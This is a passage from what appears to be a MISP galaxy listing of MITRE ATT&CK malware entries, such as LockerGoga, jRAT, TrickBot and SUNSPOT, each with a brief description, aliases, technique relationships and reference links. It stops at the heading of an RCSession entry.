[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)

The tag is: misp-galaxy:mitre-malware="LockerGoga - S0372"

LockerGoga - S0372 is also known as:

  • LockerGoga

Table 7610. Table References

Links

https://attack.mitre.org/software/S0372

https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/

https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/

Socksbot - S0273

[Socksbot](https://attack.mitre.org/software/S0273) is a backdoor that abuses Socket Secure (SOCKS) proxies. (Citation: TrendMicro Patchwork Dec 2017)

The tag is: misp-galaxy:mitre-malware="Socksbot - S0273"

Socksbot - S0273 is also known as:

  • Socksbot

Table 7611. Table References

Links

https://attack.mitre.org/software/S0273

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

Skygofree - S0327

[Skygofree](https://attack.mitre.org/software/S0327) is Android spyware that is believed to have been developed in 2014 and used through at least 2017. (Citation: Kaspersky-Skygofree)

The tag is: misp-galaxy:mitre-malware="Skygofree - S0327"

Skygofree - S0327 is also known as:

  • Skygofree

Table 7612. Table References

Links

https://attack.mitre.org/software/S0327

https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/

jRAT - S0283

[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://attack.mitre.org/software/S0283) have been distributed via a software-as-a-service platform, similar to an online subscription model.(Citation: Kaspersky Adwind Feb 2016) (Citation: jRAT Symantec Aug 2018)

The tag is: misp-galaxy:mitre-malware="jRAT - S0283"

jRAT - S0283 is also known as:

  • jRAT

  • JSocket

  • AlienSpy

  • Frutas

  • Sockrat

  • Unrecom

  • jFrutas

  • Adwind

  • jBiFrost

  • Trojan.Maljava

Table 7613. Table References

Links

https://attack.mitre.org/software/S0283

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindPublicReport_2016.pdf

https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools

https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques

ServHelper - S0382

[ServHelper](https://attack.mitre.org/software/S0382) is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.(Citation: Proofpoint TA505 Jan 2019)

The tag is: misp-galaxy:mitre-malware="ServHelper - S0382"

ServHelper - S0382 is also known as:

  • ServHelper

Table 7614. Table References

Links

https://attack.mitre.org/software/S0382

https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505

Proxysvc - S0238

[Proxysvc](https://attack.mitre.org/software/S0238) is a malicious DLL used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://attack.mitre.org/software/S0238) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. (Citation: McAfee GhostSecret)

The tag is: misp-galaxy:mitre-malware="Proxysvc - S0238"

Proxysvc - S0238 is also known as:

  • Proxysvc

Table 7615. Table References

Links

https://attack.mitre.org/software/S0238

https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/

BrainTest - S0293

[BrainTest](https://attack.mitre.org/software/S0293) is a family of Android malware. (Citation: CheckPoint-BrainTest) (Citation: Lookout-BrainTest)

The tag is: misp-galaxy:mitre-malware="BrainTest - S0293"

BrainTest - S0293 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

Table 7616. Table References

Links

http://blog.checkpoint.com/2015/09/21/braintest-a-new-level-of-sophistication-in-mobile-malware/

https://attack.mitre.org/software/S0293

https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/

Bankshot - S0239

[Bankshot](https://attack.mitre.org/software/S0239) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://attack.mitre.org/groups/G0032) used the [Bankshot](https://attack.mitre.org/software/S0239) implant in attacks against the Turkish financial sector. (Citation: McAfee Bankshot)

The tag is: misp-galaxy:mitre-malware="Bankshot - S0239"

Bankshot - S0239 is also known as:

  • Bankshot

  • Trojan Manuscript

Table 7617. Table References

Links

https://attack.mitre.org/software/S0239

https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/

Tangelo - S0329

[Tangelo](https://attack.mitre.org/software/S0329) is iOS malware that is believed to be from the same developers as the [Stealth Mango](https://attack.mitre.org/software/S0328) Android malware. It is not a mobile application, but rather a Debian package that can only run on jailbroken iOS devices. (Citation: Lookout-StealthMango)

The tag is: misp-galaxy:mitre-malware="Tangelo - S0329"

Tangelo - S0329 is also known as:

  • Tangelo

Table 7618. Table References

Links

https://attack.mitre.org/software/S0329

https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf

VBShower - S0442

[VBShower](https://attack.mitre.org/software/S0442) is a backdoor that has been used by [Inception](https://attack.mitre.org/groups/G0100) since at least 2019. [VBShower](https://attack.mitre.org/software/S0442) has been used as a downloader for second stage payloads, including [PowerShower](https://attack.mitre.org/software/S0441).(Citation: Kaspersky Cloud Atlas August 2019)

The tag is: misp-galaxy:mitre-malware="VBShower - S0442"

VBShower - S0442 is also known as:

  • VBShower

Table 7619. Table References

Links

https://attack.mitre.org/software/S0442

https://securelist.com/recent-cloud-atlas-activity/92016/

Comnie - S0244

[Comnie](https://attack.mitre.org/software/S0244) is a remote backdoor which has been used in attacks in East Asia. (Citation: Palo Alto Comnie)

The tag is: misp-galaxy:mitre-malware="Comnie - S0244"

Comnie - S0244 is also known as:

  • Comnie

Table 7620. Table References

Links

https://attack.mitre.org/software/S0244

https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/

Triada - S0424

[Triada](https://attack.mitre.org/software/S0424) was first reported in 2016 as a second stage malware. Later versions in 2019 appeared with new techniques and as an initial downloader of other Trojan apps.(Citation: Kaspersky Triada March 2016)

The tag is: misp-galaxy:mitre-malware="Triada - S0424"

Triada - S0424 is also known as:

  • Triada

Table 7621. Table References

Links

https://attack.mitre.org/software/S0424

https://www.kaspersky.com/blog/triada-trojan/11481/

BADCALL - S0245

[BADCALL](https://attack.mitre.org/software/S0245) is a Trojan malware variant used by the group [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT BADCALL)

The tag is: misp-galaxy:mitre-malware="BADCALL - S0245"

BADCALL - S0245 is also known as:

  • BADCALL

Table 7622. Table References

Links

https://attack.mitre.org/software/S0245

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF

PLAINTEE - S0254

[PLAINTEE](https://attack.mitre.org/software/S0254) is a malware sample that has been used by [Rancor](https://attack.mitre.org/groups/G0075) in targeted attacks in Singapore and Cambodia. (Citation: Rancor Unit42 June 2018)

The tag is: misp-galaxy:mitre-malware="PLAINTEE - S0254"

PLAINTEE - S0254 is also known as:

  • PLAINTEE

Table 7623. Table References

Links

https://attack.mitre.org/software/S0254

https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

USBferry - S0452

[USBferry](https://attack.mitre.org/software/S0452) is an information stealing malware and has been used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://attack.mitre.org/software/S0452) shares an overlapping codebase with [YAHOYAH](https://attack.mitre.org/software/S0388), though it has several features which makes it a distinct piece of malware.(Citation: TrendMicro Tropic Trooper May 2020)

The tag is: misp-galaxy:mitre-malware="USBferry - S0452"

USBferry - S0452 is also known as:

  • USBferry

Table 7624. Table References

Links

https://attack.mitre.org/software/S0452

https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf

CARROTBAT - S0462

[CARROTBAT](https://attack.mitre.org/software/S0462) is a customized dropper that has been in use since at least 2017. [CARROTBAT](https://attack.mitre.org/software/S0462) has been used to install [SYSCON](https://attack.mitre.org/software/S0464) and has infrastructure overlap with [KONNI](https://attack.mitre.org/software/S0356).(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)

The tag is: misp-galaxy:mitre-malware="CARROTBAT - S0462"

CARROTBAT - S0462 is also known as:

  • CARROTBAT

Table 7625. Table References

Links

https://attack.mitre.org/software/S0462

https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/

HARDRAIN - S0246

[HARDRAIN](https://attack.mitre.org/software/S0246) is a Trojan malware variant reportedly used by the North Korean government. (Citation: US-CERT HARDRAIN March 2018)

The tag is: misp-galaxy:mitre-malware="HARDRAIN - S0246"

HARDRAIN - S0246 is also known as:

  • HARDRAIN

Table 7626. Table References

Links

https://attack.mitre.org/software/S0246

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf

BADFLICK - S0642

[BADFLICK](https://attack.mitre.org/software/S0642) is a backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065) in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.(Citation: FireEye Periscope March 2018)(Citation: Accenture MUDCARP March 2019)

The tag is: misp-galaxy:mitre-malware="BADFLICK - S0642"

BADFLICK - S0642 is also known as:

  • BADFLICK

Table 7627. Table References

Links

https://attack.mitre.org/software/S0642

https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

OopsIE - S0264

[OopsIE](https://attack.mitre.org/software/S0264) is a Trojan used by [OilRig](https://attack.mitre.org/groups/G0049) to remotely execute commands as well as upload/download files to/from victims. (Citation: Unit 42 OopsIE! Feb 2018)

The tag is: misp-galaxy:mitre-malware="OopsIE - S0264"

OopsIE - S0264 is also known as:

  • OopsIE

Table 7628. Table References

Links

https://attack.mitre.org/software/S0264

https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/

https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/

Ecipekac - S0624

[Ecipekac](https://attack.mitre.org/software/S0624) is a multi-layer loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2019 including use as a loader for [P8RAT](https://attack.mitre.org/software/S0626), [SodaMaster](https://attack.mitre.org/software/S0627), and [FYAnti](https://attack.mitre.org/software/S0628).(Citation: Securelist APT10 March 2021)

The tag is: misp-galaxy:mitre-malware="Ecipekac - S0624"

Ecipekac - S0624 is also known as:

  • Ecipekac

  • HEAVYHAND

  • SigLoader

  • DESLoader

Table 7629. Table References

Links

https://attack.mitre.org/software/S0624

https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

NavRAT - S0247

[NavRAT](https://attack.mitre.org/software/S0247) is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. (Citation: Talos NavRAT May 2018)

The tag is: misp-galaxy:mitre-malware="NavRAT - S0247"

NavRAT - S0247 is also known as:

  • NavRAT

Table 7630. Table References

Links

https://attack.mitre.org/software/S0247

https://blog.talosintelligence.com/2018/05/navrat.html

Calisto - S0274

[Calisto](https://attack.mitre.org/software/S0274) is a macOS Trojan that opens a backdoor on the compromised machine. [Calisto](https://attack.mitre.org/software/S0274) is believed to have first been developed in 2016. (Citation: Securelist Calisto July 2018) (Citation: Symantec Calisto July 2018)

The tag is: misp-galaxy:mitre-malware="Calisto - S0274"

Calisto - S0274 is also known as:

  • Calisto

Table 7631. Table References

Links

https://attack.mitre.org/software/S0274

https://securelist.com/calisto-trojan-for-macos/86543/

https://web.archive.org/web/20190111082249/https://www.symantec.com/security-center/writeup/2018-073014-2512-99?om_rssid=sr-latestthreats30days

TrickMo - S0427

[TrickMo](https://attack.mitre.org/software/S0427) a 2FA bypass mobile banking trojan, most likely being distributed by [TrickBot](https://attack.mitre.org/software/S0266). [TrickMo](https://attack.mitre.org/software/S0427) has been primarily targeting users located in Germany.(Citation: SecurityIntelligence TrickMo)

[TrickMo](https://attack.mitre.org/software/S0427) is designed to steal transaction authorization numbers (TANs), which are typically used as one-time passwords.(Citation: SecurityIntelligence TrickMo)

The tag is: misp-galaxy:mitre-malware="TrickMo - S0427"

TrickMo - S0427 is also known as:

  • TrickMo

Table 7632. Table References

Links

https://attack.mitre.org/software/S0427

https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/

down_new - S0472

[down_new](https://attack.mitre.org/software/S0472) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="down_new - S0472"

down_new - S0472 is also known as:

  • down_new

Table 7633. Table References

Links

https://attack.mitre.org/software/S0472

https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

PoetRAT - S0428

[PoetRAT](https://attack.mitre.org/software/S0428) is a remote access trojan (RAT) that was first identified in April 2020. [PoetRAT](https://attack.mitre.org/software/S0428) has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. [PoetRAT](https://attack.mitre.org/software/S0428) derived its name from references in the code to poet William Shakespeare. (Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)(Citation: Dragos Threat Report 2020)

The tag is: misp-galaxy:mitre-malware="PoetRAT - S0428"

PoetRAT - S0428 is also known as:

  • PoetRAT

Table 7634. Table References

Links

https://attack.mitre.org/software/S0428

https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html

https://blog.talosintelligence.com/2020/10/poetrat-update.html

https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770

Bundlore - S0482

[Bundlore](https://attack.mitre.org/software/S0482) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://attack.mitre.org/software/S0482) has many features associated with more traditional backdoors.(Citation: MacKeeper Bundlore Apr 2019)

The tag is: misp-galaxy:mitre-malware="Bundlore - S0482"

Bundlore - S0482 is also known as:

  • Bundlore

  • OSX.Bundlore

Table 7635. Table References

Links

https://attack.mitre.org/software/S0482

https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/

More_eggs - S0284

[More_eggs](https://attack.mitre.org/software/S0284) is a JScript backdoor used by [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN6](https://attack.mitre.org/groups/G0037). Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. (Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)

The tag is: misp-galaxy:mitre-malware="More_eggs - S0284"

More_eggs - S0284 is also known as:

  • More_eggs

  • SKID

  • Terra Loader

  • SpicyOmelette

Table 7636. Table References

Links

https://attack.mitre.org/software/S0284

https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/

https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

yty - S0248

[yty](https://attack.mitre.org/software/S0248) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. (Citation: ASERT Donot March 2018)

The tag is: misp-galaxy:mitre-malware="yty - S0248"

yty - S0248 is also known as:

  • yty

Table 7637. Table References

Links

https://attack.mitre.org/software/S0248

https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/

ShiftyBug - S0294

[ShiftyBug](https://attack.mitre.org/software/S0294) is an auto-rooting adware family of malware for Android. The family is very similar to the other Android families known as Shedun, Shuanet, Kemoge, though it is not believed all the families were created by the same group. (Citation: Lookout-Adware)

The tag is: misp-galaxy:mitre-malware="ShiftyBug - S0294"

ShiftyBug - S0294 has relationships with:

  • similar: misp-galaxy:android="Kemoge" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1404" with estimative-language:likelihood-probability="almost-certain"

Table 7638. Table References

Links

https://attack.mitre.org/software/S0294

https://blog.lookout.com/blog/2015/11/04/trojanized-adware/

CookieMiner - S0492

[CookieMiner](https://attack.mitre.org/software/S0492) is mac-based malware that targets information associated with cryptocurrency exchanges as well as enabling cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.(Citation: Unit42 CookieMiner Jan 2019)

The tag is: misp-galaxy:mitre-malware="CookieMiner - S0492"

CookieMiner - S0492 is also known as:

  • CookieMiner

Table 7639. Table References

Links

https://attack.mitre.org/software/S0492

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

Pay2Key - S0556

[Pay2Key](https://attack.mitre.org/software/S0556) is a ransomware written in C++ that has been used by [Fox Kitten](https://attack.mitre.org/groups/G0117) since at least July 2020 including campaigns against Israeli companies. [Pay2Key](https://attack.mitre.org/software/S0556) has been incorporated with a leak site to display stolen sensitive information to further pressure victims into payment.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)

The tag is: misp-galaxy:mitre-malware="Pay2Key - S0556"

Pay2Key - S0556 is also known as:

  • Pay2Key

Table 7640. Table References

Links

https://attack.mitre.org/software/S0556

https://research.checkpoint.com/2020/ransomware-alert-pay2key/

https://www.clearskysec.com/fox-kitten/

DDKONG - S0255

[DDKONG](https://attack.mitre.org/software/S0255) is a malware sample that was part of a campaign by [Rancor](https://attack.mitre.org/groups/G0075). [DDKONG](https://attack.mitre.org/software/S0255) was first seen used in February 2017. (Citation: Rancor Unit42 June 2018)

The tag is: misp-galaxy:mitre-malware="DDKONG - S0255"

Table 7641. Table References

Links

https://attack.mitre.org/software/S0255

https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

MarkiRAT - S0652

[MarkiRAT](https://attack.mitre.org/software/S0652) is a remote access Trojan (RAT) compiled with Visual Studio that has been used by [Ferocious Kitten](https://attack.mitre.org/groups/G0137) since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)

The tag is: misp-galaxy:mitre-malware="MarkiRAT - S0652"

MarkiRAT - S0652 is also known as:

  • MarkiRAT

Table 7642. Table References

Links

https://attack.mitre.org/software/S0652

https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

Cuba - S0625

[Cuba](https://attack.mitre.org/software/S0625) is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.(Citation: McAfee Cuba April 2021)

The tag is: misp-galaxy:mitre-malware="Cuba - S0625"

Cuba - S0625 is also known as:

  • Cuba

Table 7643. Table References

Links

https://attack.mitre.org/software/S0625

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf

KGH_SPY - S0526

[KGH_SPY](https://attack.mitre.org/software/S0526) is a modular suite of tools used by [Kimsuky](https://attack.mitre.org/groups/G0094) for reconnaissance, information stealing, and backdoor capabilities. [KGH_SPY](https://attack.mitre.org/software/S0526) derived its name from PDB paths and internal names found in samples containing "KGH".(Citation: Cybereason Kimsuky November 2020)

The tag is: misp-galaxy:mitre-malware="KGH_SPY - S0526"

KGH_SPY - S0526 is also known as:

  • KGH_SPY

Table 7644. Table References

Links

https://attack.mitre.org/software/S0526

https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

Kazuar - S0265

[Kazuar](https://attack.mitre.org/software/S0265) is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. (Citation: Unit 42 Kazuar May 2017)

The tag is: misp-galaxy:mitre-malware="Kazuar - S0265"

Kazuar - S0265 is also known as:

  • Kazuar

Table 7645. Table References

Links

https://attack.mitre.org/software/S0265

https://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/

Mosquito - S0256

[Mosquito](https://attack.mitre.org/software/S0256) is a Win32 backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). [Mosquito](https://attack.mitre.org/software/S0256) is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. (Citation: ESET Turla Mosquito Jan 2018)

The tag is: misp-galaxy:mitre-malware="Mosquito - S0256"

Mosquito - S0256 is also known as:

  • Mosquito

Table 7646. Table References

Links

https://attack.mitre.org/software/S0256

https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf

SUNSPOT - S0562

[SUNSPOT](https://attack.mitre.org/software/S0562) is an implant that injected the [SUNBURST](https://attack.mitre.org/software/S0559) backdoor into the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: CrowdStrike SUNSPOT Implant January 2021)

The tag is: misp-galaxy:mitre-malware="SUNSPOT - S0562"

SUNSPOT - S0562 is also known as:

  • SUNSPOT

Table 7647. Table References

Links

https://attack.mitre.org/software/S0562

https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

UPPERCUT - S0275

[UPPERCUT](https://attack.mitre.org/software/S0275) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045). (Citation: FireEye APT10 Sept 2018)

The tag is: misp-galaxy:mitre-malware="UPPERCUT - S0275"

UPPERCUT - S0275 is also known as:

  • UPPERCUT

  • ANEL

Table 7648. Table References

Links

https://attack.mitre.org/software/S0275

https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html

VERMIN - S0257

[VERMIN](https://attack.mitre.org/software/S0257) is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. (Citation: Unit 42 VERMIN Jan 2018)

The tag is: misp-galaxy:mitre-malware="VERMIN - S0257"

VERMIN - S0257 is also known as:

  • VERMIN

Table 7649. Table References

Links

https://attack.mitre.org/software/S0257

https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/

LookBack - S0582

[LookBack](https://attack.mitre.org/software/S0582) is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using [LookBack](https://attack.mitre.org/software/S0582).(Citation: Proofpoint LookBack Malware Aug 2019)(Citation: Dragos TALONITE)(Citation: Dragos Threat Report 2020)

The tag is: misp-galaxy:mitre-malware="LookBack - S0582"

LookBack - S0582 is also known as:

  • LookBack

Table 7650. Table References

Links

https://attack.mitre.org/software/S0582

https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770

https://www.dragos.com/threat/talonite/

https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks

OldBoot - S0285

[OldBoot](https://attack.mitre.org/software/S0285) is an Android malware family. (Citation: HackerNews-OldBoot)

The tag is: misp-galaxy:mitre-malware="OldBoot - S0285"

OldBoot - S0285 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1398" with estimative-language:likelihood-probability="almost-certain"

Table 7651. Table References

Links

http://thehackernews.com/2014/01/first-widely-distributed-android.html

https://attack.mitre.org/software/S0285

RGDoor - S0258

[RGDoor](https://attack.mitre.org/software/S0258) is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. [RGDoor](https://attack.mitre.org/software/S0258) has been seen deployed on webservers belonging to the Middle East government organizations. [RGDoor](https://attack.mitre.org/software/S0258) provides backdoor access to compromised IIS servers. (Citation: Unit 42 RGDoor Jan 2018)

The tag is: misp-galaxy:mitre-malware="RGDoor - S0258"

RGDoor - S0258 is also known as:

  • RGDoor

Table 7652. Table References

Links

https://attack.mitre.org/software/S0258

https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/

Javali - S0528

[Javali](https://attack.mitre.org/software/S0528) is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.(Citation: Securelist Brazilian Banking Malware July 2020)

The tag is: misp-galaxy:mitre-malware="Javali - S0528"

Javali - S0528 is also known as:

  • Javali

Table 7653. Table References

Links

https://attack.mitre.org/software/S0528

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

RCSAndroid - S0295

[RCSAndroid](https://attack.mitre.org/software/S0295) is Android malware. (Citation: TrendMicro-RCSAndroid)

The tag is: misp-galaxy:mitre-malware="RCSAndroid - S0295"

RCSAndroid - S0295 is also known as:

  • RCSAndroid

RCSAndroid - S0295 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Other Network Medium - T1438" with estimative-language:likelihood-probability="almost-certain"

Table 7654. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/

https://attack.mitre.org/software/S0295

InnaputRAT - S0259

[InnaputRAT](https://attack.mitre.org/software/S0259) is a remote access tool that can exfiltrate files from a victim’s machine. [InnaputRAT](https://attack.mitre.org/software/S0259) has been seen out in the wild since 2016. (Citation: ASERT InnaputRAT April 2018)

The tag is: misp-galaxy:mitre-malware="InnaputRAT - S0259"

InnaputRAT - S0259 is also known as:

  • InnaputRAT

Table 7655. Table References

Links

https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/

https://attack.mitre.org/software/S0259

CarbonSteal - S0529

[CarbonSteal](https://attack.mitre.org/software/S0529) is one of a family of four surveillanceware tools that share a common C2 infrastructure. [CarbonSteal](https://attack.mitre.org/software/S0529) primarily deals with audio surveillance. (Citation: Lookout Uyghur Campaign)

The tag is: misp-galaxy:mitre-malware="CarbonSteal - S0529"

CarbonSteal - S0529 is also known as:

  • CarbonSteal

Table 7656. Table References

Links

https://attack.mitre.org/software/S0529

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

P8RAT - S0626

[P8RAT](https://attack.mitre.org/software/S0626) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)

The tag is: misp-galaxy:mitre-malware="P8RAT - S0626"

P8RAT - S0626 is also known as:

  • P8RAT

  • HEAVYPOT

  • GreetCake

Table 7657. Table References

Links

https://attack.mitre.org/software/S0626

https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

TrickBot - S0266

[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) was developed and initially used by [Wizard Spider](https://attack.mitre.org/groups/G0102) for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of "big game hunting" ransomware campaigns.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: IBM TrickBot Nov 2016)(Citation: CrowdStrike Wizard Spider October 2020)

The tag is: misp-galaxy:mitre-malware="TrickBot - S0266"

TrickBot - S0266 is also known as:

  • TrickBot

  • Totbrick

  • TSPY_TRICKLOAD

Table 7658. Table References

Links

https://attack.mitre.org/software/S0266

https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/

https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick

https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n

RCSession - S0662

